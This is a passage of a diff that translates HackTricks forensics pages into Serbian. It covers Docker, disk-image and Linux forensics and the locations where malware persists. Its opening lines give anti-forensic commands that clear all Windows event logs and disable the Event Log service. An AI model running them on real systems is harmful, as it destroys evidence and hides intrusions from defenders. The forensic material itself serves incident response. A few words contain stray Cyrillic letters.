"%1"` - `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }` ### Disable Windows event logs - `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f` -- Inside the services section disable the service "Windows Event Log" -- `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl` +- Unutar sekcije servisa onemogućite servis "Windows Event Log" +- `WEvtUtil.exec clear-log` ili `WEvtUtil.exe cl` ### Disable $UsnJrnl diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md index 629251985..7bd820d6b 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md 
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md @@ -2,24 +2,16 @@ {{#include ../../banners/hacktricks-training.md}} -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} ## Container modification -There are suspicions that some docker container was compromised: - +Postoje sumnje da je neki docker kontejner bio kompromitovan: ```bash docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress ``` - -You can easily **find the modifications done to this container with regards to the image** with: - +Možete lako **pronaći izmene koje su izvršene na ovom kontejneru u vezi sa slikom** pomoću: ```bash docker diff wordpress C /var 
@@ -33,70 +25,52 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI A /var/lib/mysql/mysql/general_log.CSV ... ``` - -In the previous command **C** means **Changed** and **A,** **Added**.\ -If you find that some interesting file like `/etc/shadow` was modified you can download it from the container to check for malicious activity with: - +U prethodnoj komandi **C** znači **Promenjeno** a **A** znači **Dodato**.\ +Ako otkrijete da je neki zanimljiv fajl kao što je `/etc/shadow` izmenjen, možete ga preuzeti iz kontejnera da proverite za malicioznu aktivnost sa: ```bash docker cp wordpress:/etc/shadow. ``` - -You can also **compare it with the original one** running a new container and extracting the file from it: - +Možete takođe **uporediti sa originalom** pokretanjem novog kontejnera i ekstrakcijom datoteke iz njega: ```bash docker run -d lamp-wordpress docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container diff original_shadow shadow ``` - -If you find that **some suspicious file was added** you can access the container and check it: - +Ako otkrijete da je **neki sumnjiv fajl dodat**, možete pristupiti kontejneru i proveriti ga: ```bash docker exec -it wordpress bash ``` +## Izmene slika -## Images modifications - -When you are given an exported docker image (probably in `.tar` format) you can use [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) to **extract a summary of the modifications**: - +Kada dobijete eksportovanu docker sliku (verovatno u `.tar` formatu), možete koristiti [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) da **izvučete sažetak izmena**: ```bash docker save > image.tar #Export the image to a .tar file container-diff analyze -t sizelayer image.tar container-diff analyze -t history image.tar container-diff analyze -t metadata image.tar ``` - -Then, you can **decompress** the image and **access the blobs** to search for 
suspicious files you may have found in the changes history: - +Zatim možete **dekompresovati** sliku i **pristupiti blobovima** da biste pretražili sumnjive datoteke koje ste možda pronašli u istoriji promena: ```bash tar -xf image.tar ``` +### Osnovna Analiza -### Basic Analysis - -You can get **basic information** from the image running: - +Možete dobiti **osnovne informacije** iz slike pokretanjem: ```bash docker inspect ``` - -You can also get a summary **history of changes** with: - +Možete takođe dobiti sažetak **istorije promena** sa: ```bash docker history --no-trunc ``` - -You can also generate a **dockerfile from an image** with: - +Možete takođe generisati **dockerfile iz slike** sa: ```bash alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage" dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers> ``` - ### Dive -In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility: - +Da biste pronašli dodate/izmenjene datoteke u docker slikama, možete koristiti [**dive**](https://github.com/wagoodman/dive) (preuzmite ga sa [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) alata: ```bash #First you need to load the image in your docker repo sudo docker load < image.tar 1 ⨯ 
@@ -105,27 +79,19 @@ Loaded image: flask:latest #And then open it with dive: sudo dive flask:latest ``` +Ovo vam omogućava da **navigirate kroz različite blobove docker slika** i proverite koji su fajlovi modifikovani/dodati. **Crvena** označava dodato, a **žuta** označava modifikovano. Koristite **tab** za prelazak na drugi prikaz i **space** za skupljanje/otvaranje foldera. -This allows you to **navigate through the different blobs of docker images** and check which files were modified/added. **Red** means added and **yellow** means modified. Use **tab** to move to the other view and **space** to collapse/open folders. - -With die you won't be able to access the content of the different stages of the image. To do so you will need to **decompress each layer and access it**.\ -You can decompress all the layers from an image from the directory where the image was decompressed executing: - +Sa die nećete moći da pristupite sadržaju različitih faza slike. Da biste to uradili, moraćete da **dekompresujete svaki sloj i pristupite mu**.\ +Možete dekompresovati sve slojeve iz slike iz direktorijuma gde je slika dekompresovana izvršavanjem: ```bash tar -xf image.tar for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done ``` +## Kredencijali iz memorije -## Credentials from memory +Napomena da kada pokrenete docker kontejner unutar hosta **možete videti procese koji se izvršavaju na kontejneru iz hosta** jednostavno pokretanjem `ps -ef` -Note that when you run a docker container inside a host **you can see the processes running on the container from the host** just running `ps -ef` +Stoga (kao root) možete **izvršiti dump memorije procesa** sa hosta i pretražiti za **kredencijalima** baš [**kao u sledećem primeru**](../../linux-hardening/privilege-escalation/#process-memory). 
-Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-hardening/privilege-escalation/#process-memory). - -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md index 214b917cf..a0839a5a1 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md 
@@ -1,25 +1,25 @@ {{#include ../../banners/hacktricks-training.md}} -# Baseline +# Osnovna linija -A baseline consists of taking a snapshot of certain parts of a system to **compare it with a future status to highlight changes**. +Osnovna linija se sastoji od pravljenja snimka određenih delova sistema kako bi se **uporedila sa budućim statusom radi isticanja promena**. -For example, you can calculate and store the hash of each file of the filesystem to be able to find out which files were modified.\ -This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all. +Na primer, možete izračunati i sačuvati hash svake datoteke u datotečnom sistemu kako biste mogli da saznate koje su datoteke modifikovane.\ +To se takođe može uraditi sa korisničkim nalozima koji su kreirani, procesima koji se izvršavaju, servisima koji se izvršavaju i bilo čim drugim što ne bi trebalo da se mnogo menja, ili uopšte. -## File Integrity Monitoring +## Praćenje integriteta datoteka -File Integrity Monitoring (FIM) is a critical security technique that protects IT environments and data by tracking changes in files. It involves two key steps: +Praćenje integriteta datoteka (FIM) je kritična bezbednosna tehnika koja štiti IT okruženja i podatke praćenjem promena u datotekama. Uključuje dva ključna koraka: -1. **Baseline Comparison:** Establish a baseline using file attributes or cryptographic checksums (like MD5 or SHA-2) for future comparisons to detect modifications. -2. **Real-Time Change Notification:** Get instant alerts when files are accessed or altered, typically through OS kernel extensions. +1. **Uporedna analiza osnovne linije:** Uspostavite osnovnu liniju koristeći atribute datoteka ili kriptografske heš vrednosti (kao što su MD5 ili SHA-2) za buduće upoređivanje radi otkrivanja modifikacija. +2. 
**Obaveštenje o promenama u realnom vremenu:** Dobijajte trenutna obaveštenja kada se datoteke pristupaju ili menjaju, obično putem ekstenzija jezgra OS-a. -## Tools +## Alati - [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring) - [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software) -## References +## Reference - [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md index a95a3bbff..e999d0154 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md @@ -1,40 +1,30 @@ -# Image Acquisition & Mount +# Akvizicija slika & Montaža {{#include ../../banners/hacktricks-training.md}} -
-{% embed url="https://websec.nl/" %} - -## Acquisition +## Akvizicija ### DD - ```bash #This will generate a raw copy of the disk dd if=/dev/sdb of=disk.img ``` - ### dcfldd - ```bash #Raw copy with hashes along the way (more secur as it checks hashes while it's copying the data) dcfldd if= of= bs=512 hash= hashwindow= hashlog= dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes ``` - ### FTK Imager -You can [**download the FTK imager from here**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1). - +Možete [**preuzeti FTK imager отсyд**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1). ```bash ftkimager /dev/sdb evidence --e01 --case-number 1 --evidence-number 1 --description 'A description' --examiner 'Your name' ``` - ### EWF -You can generate a disk image using the[ **ewf tools**](https://github.com/libyal/libewf). - +Možete generisati sliku diska koristeći [**ewf tools**](https://github.com/libyal/libewf). ```bash ewfacquire /dev/sdb #Name: evidence @@ -51,15 +41,13 @@ ewfacquire /dev/sdb #Then use default values #It will generate the disk image in the current directory ``` +## Montiranje -## Mount +### Nekoliko tipova -### Several types - -In **Windows** you can try to use the free version of Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) to **mount the forensics image**. +U **Windows** možete pokušati da koristite besplatnu verziju Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) da **montirate forenzičku sliku**. ### Raw - ```bash #Get file type file evidence.img @@ -68,9 +56,7 @@ evidence.img: Linux rev 1.0 ext4 filesystem data, UUID=1031571c-f398-4bfb-a414-b #Mount it mount evidence.img /mnt ``` - ### EWF - ```bash #Get file type file evidence.E01 
@@ -85,16 +71,14 @@ output/ewf1: Linux rev 1.0 ext4 filesystem data, UUID=05acca66-d042-4ab2-9e9c-be #Mount mount output/ewf1 -o ro,norecovery /mnt ``` - ### ArsenalImageMounter -It's a Windows Application to mount volumes. You can download it here [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/) +To je Windows aplikacija za montiranje volumena. Možete je preuzeti ovde [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/) -### Errors - -- **`cannot mount /dev/loop0 read-only`** in this case you need to use the flags **`-o ro,norecovery`** -- **`wrong fs type, bad option, bad superblock on /dev/loop0, missing codepage or helper program, or other error.`** in this case the mount failed due as the offset of the filesystem is different than that of the disk image. You need to find the Sector size and the Start sector: +### Greške +- **`cannot mount /dev/loop0 read-only`** u ovom slučaju treba da koristite oznake **`-o ro,norecovery`** +- **`wrong fs type, bad option, bad superblock on /dev/loop0, missing codepage or helper program, or other error.`** u ovom slučaju montiranje je neuspešno jer je pomeraj datotečnog sistema drugačiji od onog na slici diska. Treba da pronađete veličinu sektora i početni sektor: ```bash fdisk -l disk.img Disk disk.img: 102 MiB, 106954648 bytes, 208896 sectors @@ -107,15 +91,8 @@ Disk identifier: 0x00495395 Device Boot Start End Sectors Size Id Type disk.img1 2048 208895 206848 101M 1 FAT12 ``` - -Note that sector size is **512** and start is **2048**. Then mount the image like this: - +Napomena da je veličina sektora **512** i da je početak **2048**. Zatim montirajte sliku ovako: ```bash mount disk.img /mnt -o ro,offset=$((2048*512)) ``` - -
- -{% embed url="https://websec.nl/" %} - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md index 568da19c5..34f536637 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md @@ -1,28 +1,17 @@ # Linux Forensics -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %} - {{#include ../../banners/hacktricks-training.md}} -## Initial Information Gathering +## Prikupljanje Početnih Informacija -### Basic Information - -First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USB, and modify the env variables to use those binaries: +### Osnovne Informacije +Prvo, preporučuje se da imate neki **USB** sa **dobro poznatim binarnim datotekama i bibliotekama** (možete jednostavno preuzeti ubuntu i kopirati foldere _/bin_, _/sbin_, _/lib,_ i _/lib64_), zatim montirajte USB i modifikujte env varijable da koristite te binarne datoteke: ```bash export PATH=/mnt/usb/bin:/mnt/usb/sbin export LD_LIBRARY_PATH=/mnt/usb/lib:/mnt/usb/lib64 ``` - -Once you have configured the system to use good and known binaries you can start **extracting some basic information**: - +Kada konfigurišete sistem da koristi dobre i poznate binarne datoteke, možete početi **izvlačenje osnovnih informacija**: ```bash date #Date and time (Clock may be skewed, Might be at a different timezone) uname -a #OS info 
@@ -40,50 +29,46 @@ cat /etc/passwd #Unexpected data? cat /etc/shadow #Unexpected data? find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory ``` +#### Sumnjive informacije -#### Suspicious information +Dok prikupljate osnovne informacije, trebali biste proveriti čudne stvari kao što su: -While obtaining the basic information you should check for weird things like: +- **Root procesi** obično se pokreću sa niskim PIDS, pa ako pronađete root proces sa velikim PID-om, možete posumnjati +- Proverite **registrovane prijave** korisnika bez shel-a unutar `/etc/passwd` +- Proverite **hash-eve lozinke** unutar `/etc/shadow` za korisnike bez shel-a -- **Root processes** usually run with low PIDS, so if you find a root process with a big PID you may suspect -- Check **registered logins** of users without a shell inside `/etc/passwd` -- Check for **password hashes** inside `/etc/shadow` for users without a shell +### Dump memorije -### Memory Dump - -To obtain the memory of the running system, it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\ -To **compile** it, you need to use the **same kernel** that the victim machine is using. +Da biste dobili memoriju pokrenutog sistema, preporučuje se korišćenje [**LiME**](https://github.com/504ensicsLabs/LiME).\ +Da biste ga **kompilirali**, morate koristiti **isti kernel** koji koristi žrtvinska mašina. > [!NOTE] -> Remember that you **cannot install LiME or any other thing** in the victim machine as it will make several changes to it - -So, if you have an identical version of Ubuntu you can use `apt-get install lime-forensics-dkms`\ -In other cases, you need to download [**LiME**](https://github.com/504ensicsLabs/LiME) from github and compile it with correct kernel headers. 
To **obtain the exact kernel headers** of the victim machine, you can just **copy the directory** `/lib/modules/` to your machine, and then **compile** LiME using them: +> Zapamtite da **ne možete instalirati LiME ili bilo šta drugo** na žrtvinskoj mašini jer će to napraviti nekoliko promena na njoj +Dakle, ako imate identičnu verziju Ubuntua, možete koristiti `apt-get install lime-forensics-dkms`\ +U drugim slučajevima, potrebno je preuzeti [**LiME**](https://github.com/504ensicsLabs/LiME) sa github-a i kompilirati ga sa ispravnim kernel header-ima. Da biste **dobili tačne kernel header-e** žrtvinske mašine, možete jednostavno **kopirati direktorijum** `/lib/modules/` na vašu mašinu, a zatim **kompilirati** LiME koristeći ih: ```bash make -C /lib/modules//build M=$PWD sudo insmod lime.ko "path=/home/sansforensics/Desktop/mem_dump.bin format=lime" ``` +LiME podržava 3 **formata**: -LiME supports 3 **formats**: +- Raw (svaki segment spojен zajedno) +- Padded (isto kao raw, ali sa nulama u desnim bitovima) +- Lime (preporučeni format sa metapodacima) -- Raw (every segment concatenated together) -- Padded (same as raw, but with zeroes in right bits) -- Lime (recommended format with metadata - -LiME can also be used to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444` +LiME se takođe može koristiti za **slanje dump-a putem mreže** umesto da se čuva na sistemu koristeći nešto poput: `path=tcp:4444` ### Disk Imaging -#### Shutting down +#### Isključivanje -First of all, you will need to **shut down the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shut down.\ -There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. 
The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but it will also allow the possible **malware** to **destroy evidence**. The "pull the plug" approach may carry **some information loss** (not much of the info is going to be lost as we already took an image of the memory ) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug. +Prvo, potrebno je da **isključite sistem**. Ovo nije uvek opcija jer ponekad sistem može biti produkcijski server koji kompanija ne može priuštiti da isključi.\ +Postoje **2 načina** za isključivanje sistema, **normalno isključivanje** i **"isključivanje iz struje"**. Prvi će omogućiti da se **procesi završe kao obično** i da se **fajl sistem** **sinhronizuje**, ali će takođe omogućiti mogućem **malware-u** da **uništi dokaze**. Pristup "isključivanja iz struje" može doneti **neki gubitak informacija** (neće se mnogo informacija izgubiti jer smo već uzeli sliku memorije) i **malware neće imati priliku** da uradi bilo šta povodom toga. Stoga, ako **sumnjate** da može biti **malware**, jednostavno izvršite **`sync`** **komandu** na sistemu i isključite iz struje. -#### Taking an image of the disk - -It's important to note that **before connecting your computer to anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying any information. +#### Uzimanje slike diska +Važno je napomenuti da **pre nego što povežete svoj računar sa bilo čim vezanim za slučaj**, morate biti sigurni da će biti **montiran kao samo za čitanje** kako biste izbegli modifikaciju bilo kojih informacija. ```bash #Create a raw copy of the disk dd if= of= bs=512 
@@ -92,11 +77,9 @@ dd if= of= bs=512 dcfldd if= of= bs=512 hash= hashwindow= hashlog= dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes ``` +### Disk Image pre-analiza -### Disk Image pre-analysis - -Imaging a disk image with no more data. - +Imaging diska bez dodatnih podataka. ```bash #Find out if it's a disk image using "file" command file disk.img @@ -108,12 +91,12 @@ raw #You can list supported types with img_stat -i list Supported image format types: - raw (Single or split raw file (dd)) - aff (Advanced Forensic Format) - afd (AFF Multiple File) - afm (AFF with external metadata) - afflib (All AFFLIB image formats (including beta ones)) - ewf (Expert Witness Format (EnCase)) +raw (Single or split raw file (dd)) +aff (Advanced Forensic Format) +afd (AFF Multiple File) +afm (AFF with external metadata) +afflib (All AFFLIB image formats (including beta ones)) +ewf (Expert Witness Format (EnCase)) #Data of the image fsstat -i raw -f ext4 disk.img @@ -149,41 +132,31 @@ r/r 16: secret.txt icat -i raw -f ext4 disk.img 16 ThisisTheMasterSecret ``` +## Pretraživanje poznatog Malware-a -
+### Izmenjeni sistemski fajlovi -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Linux nudi alate za osiguranje integriteta sistemskih komponenti, što je ključno za uočavanje potencijalno problematičnih fajlova. -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %} +- **RedHat-bazirani sistemi**: Koristite `rpm -Va` za sveobuhvatnu proveru. +- **Debian-bazirani sistemi**: `dpkg --verify` za inicijalnu verifikaciju, a zatim `debsums | grep -v "OK$"` (nakon instalacije `debsums` sa `apt-get install debsums`) za identifikaciju bilo kakvih problema. -## Search for known Malware +### Malware/Rootkit detektori -### Modified System Files - -Linux offers tools for ensuring the integrity of system components, crucial for spotting potentially problematic files. - -- **RedHat-based systems**: Use `rpm -Va` for a comprehensive check. -- **Debian-based systems**: `dpkg --verify` for initial verification, followed by `debsums | grep -v "OK$"` (after installing `debsums` with `apt-get install debsums`) to identify any issues. - -### Malware/Rootkit Detectors - -Read the following page to learn about tools that can be useful to find malware: +Pročitajte sledeću stranicu da biste saznali više o alatima koji mogu biti korisni za pronalaženje malware-a: {{#ref}} malware-analysis.md {{#endref}} -## Search installed programs +## Pretraživanje instaliranih programa -To effectively search for installed programs on both Debian and RedHat systems, consider leveraging system logs and databases alongside manual checks in common directories. 
+Da biste efikasno pretražili instalirane programe na Debian i RedHat sistemima, razmotrite korišćenje sistemskih logova i baza podataka zajedno sa ručnim proverama u uobičajenim direktorijumima. -- For Debian, inspect _**`/var/lib/dpkg/status`**_ and _**`/var/log/dpkg.log`**_ to fetch details about package installations, using `grep` to filter for specific information. -- RedHat users can query the RPM database with `rpm -qa --root=/mntpath/var/lib/rpm` to list installed packages. - -To uncover software installed manually or outside of these package managers, explore directories like _**`/usr/local`**_, _**`/opt`**_, _**`/usr/sbin`**_, _**`/usr/bin`**_, _**`/bin`**_, and _**`/sbin`**_. Combine directory listings with system-specific commands to identify executables not associated with known packages, enhancing your search for all installed programs. +- Za Debian, proverite _**`/var/lib/dpkg/status`**_ i _**`/var/log/dpkg.log`**_ da biste dobili detalje o instalacijama paketa, koristeći `grep` za filtriranje specifičnih informacija. +- RedHat korisnici mogu upitati RPM bazu podataka sa `rpm -qa --root=/mntpath/var/lib/rpm` da bi prikazali instalirane pakete. +Da biste otkrili softver instaliran ručno ili van ovih menadžera paketa, istražite direktorijume kao što su _**`/usr/local`**_, _**`/opt`**_, _**`/usr/sbin`**_, _**`/usr/bin`**_, _**`/bin`**_, i _**`/sbin`**_. Kombinujte liste direktorijuma sa sistemskim komandama specifičnim za identifikaciju izvršnih fajlova koji nisu povezani sa poznatim paketima, poboljšavajući vaše pretraživanje svih instaliranih programa. ```bash # Debian package and log details cat /var/lib/dpkg/status | grep -E "Package:|Status:" @@ -199,29 +172,17 @@ find /sbin/ –exec rpm -qf {} \; | grep "is not" # Find exacuable files find / -type f -executable | grep ``` +## Oporavak Izbrisanih Pokrenutih Binarnih Datoteka -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %} - -## Recover Deleted Running Binaries - -Imagine a process that was executed from /tmp/exec and then deleted. It's possible to extract it - +Zamislite proces koji je izvršen iz /tmp/exec i zatim obrisan. Moguće je izvući ga. ```bash cd /proc/3746/ #PID with the exec file deleted head -1 maps #Get address of the file. It was 08048000-08049000 dd if=mem bs=1 skip=08048000 count=1000 of=/tmp/exec2 #Recorver it ``` +## Inspekcija lokacija za automatsko pokretanje -## Inspect Autostart locations - -### Scheduled Tasks - +### Zakazani zadaci ```bash cat /var/spool/cron/crontabs/* \ /var/spool/cron/atjobs \ 
@@ -235,61 +196,60 @@ cat /var/spool/cron/crontabs/* \ #MacOS ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ``` +### Usluge -### Services +Putanje gde se zlonamerni softver može instalirati kao usluga: -Paths where a malware could be installed as a service: +- **/etc/inittab**: Poziva skripte inicijalizacije kao što su rc.sysinit, usmeravajući dalje na skripte za pokretanje. +- **/etc/rc.d/** i **/etc/rc.boot/**: Sadrže skripte za pokretanje usluga, pri čemu se potonja nalazi u starijim verzijama Linux-a. +- **/etc/init.d/**: Koristi se u određenim verzijama Linux-a kao što je Debian za čuvanje skripti za pokretanje. +- Usluge se takođe mogu aktivirati putem **/etc/inetd.conf** ili **/etc/xinetd/**, u zavisnosti od Linux varijante. +- **/etc/systemd/system**: Direktorijum za skripte menadžera sistema i usluga. +- **/etc/systemd/system/multi-user.target.wants/**: Sadrži linkove do usluga koje treba pokrenuti u višekorisničkom režimu. +- **/usr/local/etc/rc.d/**: Za prilagođene ili usluge trećih strana. +- **\~/.config/autostart/**: Za automatske aplikacije specifične za korisnika, koje mogu biti skriveno mesto za zlonamerni softver usmeren na korisnike. +- **/lib/systemd/system/**: Podrazumevane jedinice sistema koje obezbeđuju instalirani paketi. -- **/etc/inittab**: Calls initialization scripts like rc.sysinit, directing further to startup scripts. -- **/etc/rc.d/** and **/etc/rc.boot/**: Contain scripts for service startup, the latter being found in older Linux versions. -- **/etc/init.d/**: Used in certain Linux versions like Debian for storing startup scripts. -- Services may also be activated via **/etc/inetd.conf** or **/etc/xinetd/**, depending on the Linux variant. -- **/etc/systemd/system**: A directory for system and service manager scripts. -- **/etc/systemd/system/multi-user.target.wants/**: Contains links to services that should be started in a multi-user runlevel. 
-- **/usr/local/etc/rc.d/**: For custom or third-party services. -- **\~/.config/autostart/**: For user-specific automatic startup applications, which can be a hiding spot for user-targeted malware. -- **/lib/systemd/system/**: System-wide default unit files provided by installed packages. +### Kernel moduli -### Kernel Modules +Linux kernel moduli, često korišćeni od strane zlonamernog softvera kao komponenti rootkita, učitavaju se prilikom pokretanja sistema. Direktorijumi i datoteke kritične za ove module uključuju: -Linux kernel modules, often utilized by malware as rootkit components, are loaded at system boot. The directories and files critical for these modules include: +- **/lib/modules/$(uname -r)**: Sadrži module za trenutnu verziju kernela. +- **/etc/modprobe.d**: Sadrži konfiguracione datoteke za kontrolu učitavanja modula. +- **/etc/modprobe** i **/etc/modprobe.conf**: Datoteke za globalne postavke modula. -- **/lib/modules/$(uname -r)**: Holds modules for the running kernel version. -- **/etc/modprobe.d**: Contains configuration files to control module loading. -- **/etc/modprobe** and **/etc/modprobe.conf**: Files for global module settings. +### Druge lokacije za automatsko pokretanje -### Other Autostart Locations +Linux koristi razne datoteke za automatsko izvršavanje programa prilikom prijavljivanja korisnika, potencijalno skrivajući zlonamerni softver: -Linux employs various files for automatically executing programs upon user login, potentially harboring malware: +- **/etc/profile.d/**\*, **/etc/profile**, i **/etc/bash.bashrc**: Izvršavaju se za bilo koju prijavu korisnika. +- **\~/.bashrc**, **\~/.bash_profile**, **\~/.profile**, i **\~/.config/autostart**: Datoteke specifične za korisnika koje se pokreću prilikom njihove prijave. +- **/etc/rc.local**: Izvršava se nakon što su sve sistemske usluge pokrenute, označavajući kraj prelaska u višekorisničko okruženje. 
-- **/etc/profile.d/**\*, **/etc/profile**, and **/etc/bash.bashrc**: Executed for any user login. -- **\~/.bashrc**, **\~/.bash_profile**, **\~/.profile**, and **\~/.config/autostart**: User-specific files that run upon their login. -- **/etc/rc.local**: Runs after all system services have started, marking the end of the transition to a multiuser environment. +## Istraži logove -## Examine Logs +Linux sistemi prate aktivnosti korisnika i događaje sistema kroz razne log datoteke. Ovi logovi su ključni za identifikaciju neovlašćenog pristupa, infekcija zlonamernim softverom i drugih bezbednosnih incidenata. Ključne log datoteke uključuju: -Linux systems track user activities and system events through various log files. These logs are pivotal for identifying unauthorized access, malware infections, and other security incidents. Key log files include: - -- **/var/log/syslog** (Debian) or **/var/log/messages** (RedHat): Capture system-wide messages and activities. -- **/var/log/auth.log** (Debian) or **/var/log/secure** (RedHat): Record authentication attempts, successful and failed logins. - - Use `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` to filter relevant authentication events. -- **/var/log/boot.log**: Contains system startup messages. -- **/var/log/maillog** or **/var/log/mail.log**: Logs email server activities, useful for tracking email-related services. -- **/var/log/kern.log**: Stores kernel messages, including errors and warnings. -- **/var/log/dmesg**: Holds device driver messages. -- **/var/log/faillog**: Records failed login attempts, aiding in security breach investigations. -- **/var/log/cron**: Logs cron job executions. -- **/var/log/daemon.log**: Tracks background service activities. -- **/var/log/btmp**: Documents failed login attempts. -- **/var/log/httpd/**: Contains Apache HTTPD error and access logs. -- **/var/log/mysqld.log** or **/var/log/mysql.log**: Logs MySQL database activities. 
-- **/var/log/xferlog**: Records FTP file transfers. -- **/var/log/**: Always check for unexpected logs here. +- **/var/log/syslog** (Debian) ili **/var/log/messages** (RedHat): Zabeležavaju poruke i aktivnosti na sistemskom nivou. +- **/var/log/auth.log** (Debian) ili **/var/log/secure** (RedHat): Beleže pokušaje autentifikacije, uspešne i neuspešne prijave. +- Koristite `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` za filtriranje relevantnih događaja autentifikacije. +- **/var/log/boot.log**: Sadrži poruke o pokretanju sistema. +- **/var/log/maillog** ili **/var/log/mail.log**: Logovi aktivnosti email servera, korisni za praćenje usluga vezanih za email. +- **/var/log/kern.log**: Čuva poruke kernela, uključujući greške i upozorenja. +- **/var/log/dmesg**: Sadrži poruke drajvera uređaja. +- **/var/log/faillog**: Beleži neuspešne pokušaje prijave, pomažući u istragama bezbednosnih proboja. +- **/var/log/cron**: Logovi izvršavanja cron poslova. +- **/var/log/daemon.log**: Prati aktivnosti pozadinskih usluga. +- **/var/log/btmp**: Dokumentuje neuspešne pokušaje prijave. +- **/var/log/httpd/**: Sadrži Apache HTTPD greške i logove pristupa. +- **/var/log/mysqld.log** ili **/var/log/mysql.log**: Logovi aktivnosti MySQL baze podataka. +- **/var/log/xferlog**: Beleži FTP transfer fajlova. +- **/var/log/**: Uvek proverite neočekivane logove ovde. > [!NOTE] -> Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. Because logs on 